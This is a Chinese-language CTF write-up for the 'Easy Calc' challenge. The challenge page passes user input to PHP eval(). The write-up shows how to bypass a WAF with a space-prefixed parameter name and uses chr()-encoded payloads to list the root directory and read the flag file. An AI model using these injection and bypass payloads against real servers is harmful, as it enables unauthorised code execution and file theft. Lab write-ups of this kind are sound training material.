Easy Calc

查看源码,发现有前端过滤

<script>
    $('#calc').submit(function(){
        $.ajax({
            url:"calc.php?num="+encodeURIComponent($("#content").val()),
            type:'GET',
            success:function(data){
                $("#result").html(`<div class="alert alert-success">
            <strong>答案:</strong>${data}
            </div>`);
            },
            error:function(){
                alert("这啥?算不来!");
            }
        })
        return false;
    })
</script>

提交到calc.php,查看源码:

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

尝试提交却发现没有权限,题目提示设置了一个安全的WAF,原来是被WAF了。输入除了数字以外的字符都会报错。

发现WAF却不是PHP源码的WAF,这里应该是还有一层除了PHP之外的WAF。

这里利用到了PHP字符串解析特性来绕过WAF。

该网页还存在一个WAF,会对num进行审计,但当在num前加上空格,即变量为%20num时,就可以绕过WAF对num的审计。在转化为PHP的key=>value时,PHP解析了传入的key,做了两件事情:

  • 删除空白符

  • 转化特殊字符

就可以把想要的变量转化为num了。

于是提交exp:

?%20num=phpinfo()

返回phpinfo();

?%20num=var_dump(scandir(chr(47)))

scandir():同Linux Shell下的ls命令类似,但是要指定目录,由于WAF过滤了/,所以需要用chr(47)来进行代替。上面的语句等同于scandir("/")

var_dump():用来返回变量具体的参数信息。例如当输出一个Array变量时,回显为Array;如果使用var_dump()函数,则可以返回变量的具体信息。

array(24) {
  [0]=>
  string(1) "."
  [1]=>
  string(2) ".."
  [2]=>
  string(10) ".dockerenv"
  [3]=>
  string(3) "bin"
  [4]=>
  string(4) "boot"
  [5]=>
  string(3) "dev"
  [6]=>
  string(3) "etc"
  [7]=>
  string(5) "f1agg"
  [8]=>
  string(4) "home"
  [9]=>
  string(3) "lib"
  [10]=>
  string(5) "lib64"
  [11]=>
  string(5) "media"
  [12]=>
  string(3) "mnt"
  [13]=>
  string(3) "opt"
  [14]=>
  string(4) "proc"
  [15]=>
  string(4) "root"
  [16]=>
  string(3) "run"
  [17]=>
  string(4) "sbin"
  [18]=>
  string(3) "srv"
  [19]=>
  string(8) "start.sh"
  [20]=>
  string(3) "sys"
  [21]=>
  string(3) "tmp"
  [22]=>
  string(3) "usr"
  [23]=>
  string(3) "var"
}

可以看到有一个flagg文件,试着读取:

?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

得到flag。

Last updated